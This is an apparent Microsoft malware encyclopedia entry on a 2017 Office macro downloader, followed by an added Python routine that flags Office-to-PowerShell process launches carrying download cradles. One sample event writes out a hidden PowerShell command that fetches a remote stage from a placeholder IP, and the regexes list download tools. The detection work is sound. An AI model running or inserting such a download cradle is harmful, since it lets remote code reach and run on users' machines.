
TrojanDownloader:O97M/Powmet.A


First posted on 19 February 2017.
Source: Microsoft

Aliases:

There are no other names known for TrojanDownloader:O97M/Powmet.A.

Explanation:

This threat is macro code contained in malicious documents. It runs when the document is opened and macros are enabled.

We have seen the malicious documents hosted on several websites.



When executed, it runs a PowerShell command that downloads and executes additional malicious files from remote URLs.


At the time of analysis, the URLs were inaccessible.
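As an added example, not part of the original Microsoft entry, the routine below flags the process chain this entry describes: an Office application spawning PowerShell whose command line carries a download cradle or a raw IP:port URL. The event layout (Sysmon Event ID 1 style fields), the severity labels and the sample records are all constructed for this example.

```python
import re

# Parent applications that host macros, and the PowerShell images they may spawn.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Well-known download-cradle tokens and raw IP:port URLs in the command line.
DOWNLOAD_HINTS = re.compile(
    r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
IP_PORT_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}/", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event.

    event: dict with 'parent', 'image' and 'cmdline' (constructed field names).
    """
    if basename(event["parent"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return None
    cmd = event["cmdline"]
    if DOWNLOAD_HINTS.search(cmd) or IP_PORT_URL.search(cmd):
        return "high"    # Office -> PowerShell with a download cradle
    return "medium"      # Office -> PowerShell without an obvious download

def scan(events):
    """Return (index, severity) for every event that classify() flags."""
    return [(i, sev) for i, e in enumerate(events) if (sev := classify(e))]

# Constructed sample events; 192.0.2.0/24 is a documentation-only range.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10:3485/stage')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-ChildItem C:\\Users"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
]

if __name__ == "__main__":
    for idx, sev in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sev} - {SAMPLE_EVENTS[idx]['cmdline']}")
```

Any Office-to-PowerShell launch is worth reviewing on its own, which is why the routine still reports a medium finding when no download token is visible.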





Analysis by Francis Tan Seng

Last update 19 February 2017
